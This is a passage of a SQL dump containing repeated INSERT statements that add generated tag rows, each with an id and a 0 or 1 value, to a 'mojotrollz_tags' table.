(`id`, `table`, `type`, `value`, `comment`) VALUES (738, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (741, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (742, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (743, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (744, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (745, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (746, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (747, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (748, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (749, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (750, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (752, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (753, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (754, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (755, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (756, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (757, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (758, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (759, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (760, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (762, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (763, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (764, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (765, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (766, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (767, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (768, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (769, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (771, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (772, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (773, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (775, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (776, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (777, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (778, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (780, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (782, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (783, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (784, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (786, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (787, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (788, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (789, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (790, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (791, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (792, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (793, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (794, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (804, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (805, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (806, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (808, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (809, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (812, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (813, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (815, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (816, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (817, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (818, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (822, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (823, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (824, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (825, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (826, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (827, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (828, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (829, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (831, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (833, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (834, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (835, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (836, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (837, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (838, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (840, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (841, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (843, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (844, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (845, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (846, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (847, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (848, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (849, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (850, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (851, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (852, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (853, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (854, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (855, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (857, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (858, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (860, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (861, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (862, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (863, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (864, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (865, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (866, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (867, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (868, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (869, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (870, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (871, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (872, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (873, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (874, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (875, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (876, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (877, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (878, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (879, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (880, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (881, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (882, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (886, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (887, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (888, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (889, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (890, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (891, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (892, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (893, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (894, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (896, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (898, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (899, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (903, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (905, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (906, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (907, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (910, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (911, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (913, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (914, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (915, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (916, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (917, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (918, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (919, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (920, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (922, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (923, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (924, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (925, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (928, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (929, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (932, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (933, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (934, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (935, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (936, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (937, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (938, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (940, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (941, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (942, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (943, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (944, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (945, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (947, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (948, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (951, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (952, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (953, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (954, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (955, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (956, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (957, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (958, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (959, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (961, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (962, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (963, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (964, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (965, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (966, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (967, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (969, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (970, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (971, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (972, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (973, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (974, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (975, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (976, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (977, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (978, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (979, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (980, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (981, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (982, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (983, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (984, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (985, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (986, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (991, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (992, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (993, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (994, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (995, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (997, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1000, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1004, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1007, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1008, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1009, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1010, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1011, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1012, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1013, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1014, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1015, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1016, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1017, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1018, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1019, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1020, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1021, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1022, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1023, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1024, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1025, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1026, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1027, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1028, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1029, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1030, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1031, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1032, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1033, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1034, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1035, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1036, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1037, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1038, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1039, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1040, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 